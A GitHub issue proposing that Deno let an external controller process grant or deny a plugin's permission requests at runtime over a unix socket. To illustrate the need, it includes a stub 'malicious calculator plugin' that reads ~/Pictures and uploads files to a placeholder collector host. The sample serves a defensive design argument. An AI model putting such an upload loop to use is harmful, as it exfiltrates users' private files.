Skip to content

Proposal: (Externally) Managed Permissions #29834

New issue
New issue
Open
Open
Proposal: (Externally) Managed Permissions#29834
@CyanChanges

Description

@CyanChanges
CyanChanges
opened on Jun 21, 2025

Goal

Allow users to safely isolate code to a seperate Deno process,
and programmatically control approve or deny permission and permission requests.

Intro

When dealing with external plugins, you may want to restrict its access.
By using permission flags, it's fixed there, but you might want to decide at runtime.
Currently, the only way you could do this is through the console,

Image

which is user-friendly, but not friendly for developers.

So adding a way to control permission programmatically is important.

Demonstration

Demonstration

The user installed a random plugin from Internet,
obviously you shouldn't give away all permission to random plugin from Internet,
and you also don't know what exactly all permissions the plugin requires.

So, instead of give away all permissions, or handling stdio and parsing strings.

We can have a controller process listen on a specific unix socket.

const listener = Deno.listen({ path: "/tmp/4567-user-plugin-permission.sock", transport: "unix" })

Then, the controller process spawn new deno process that run the plugin, with the --permission-controller flag

deno --permission-controller=/tmp/4567-user-plugin-permission.sock --allow-import run user_plugin_loader.ts plugins/4567-malicious-calculator-plugin.ts

Turns out the plugin is malicious.
It is trying to upload user's pictures.

export async function apply(ctx) {
  // ...
  for (const entry of Deno.readDirSync("~/Pictures")) { 
    // oh no, it's trying to upload all pictures from the user
    await fetch("https://malicious-information-collector/upload", {
      ...
    })
  }
  // ...
}

The malicious plugin requests read access to ~/Pictures.
Instead of prompting in console,
Deno sends a request to the socket specified in --permission-controller with all the information,
asking the external controller if it is allowed or not.

Then the controller process could prompt the user,
for example, show a popup to the user in the WebUI,
asking if the user wants to allow it.

The user reject it, since it doesn't make any sense for a calculator plugin to access their photos.
So the controller process could tell the Deno process to deny it, or simply killing it.

Uncaught NotCapable: Requires read access to "/home/cyan/Pictures", denied by external controller

So, our "virtual" framework successfully prevent the malicious plugin from reading user's pictures, enforce the security.
I thought it would have many use cases.

Interfaces

Todo

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions